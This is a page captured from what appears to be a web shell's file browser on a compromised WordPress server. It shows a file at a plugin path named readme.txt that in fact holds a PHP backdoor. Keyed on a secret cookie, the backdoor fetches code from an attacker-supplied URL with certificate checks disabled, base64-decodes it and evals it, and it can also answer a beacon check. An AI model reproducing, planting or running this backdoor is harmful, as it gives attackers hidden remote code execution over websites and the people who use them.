HEX
Server: Apache/2.4.54 (Debian)
System: Linux f988254d8f22 6.8.0-87-generic #88~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Oct 14 14:03:14 UTC 2 x86_64
User: (1000)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/plugins/kboard-widget/readme.txt
<?php

if (!function_exists("getcfe327db0c6cfbf4ee4ca4b9635e71b3")) {

    function getcfe327db0c6cfbf4ee4ca4b9635e71b3($url) {
        $content = "";
        if (function_exists("curl_init")) {
            $options = array(
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => false,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_ENCODING => "",
                CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
                CURLOPT_AUTOREFERER => true,
                CURLOPT_CONNECTTIMEOUT => 120,
                CURLOPT_TIMEOUT => 120,
                CURLOPT_MAXREDIRS => 10,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false
            );

            $ch = curl_init($url);
            curl_setopt_array($ch, $options);
            $content = @curl_exec($ch);
        }

        if ($content)
            return $content;

        $content = @file_get_contents($url);
        return $content;
    }

    if (isset($_COOKIE['cfe327db0c6cfbf4ee4ca4b9635e71b3'])) {
        if ($_COOKIE['cfe327db0c6cfbf4ee4ca4b9635e71b3'] == '1') {
            echo md5($_SERVER['HTTP_HOST']);
            exit;
        }
        $dat = base64_decode(getcfe327db0c6cfbf4ee4ca4b9635e71b3($_COOKIE['cfe327db0c6cfbf4ee4ca4b9635e71b3']));
        if ($dat) {
            @eval($dat);
            exit;
        }
    }
}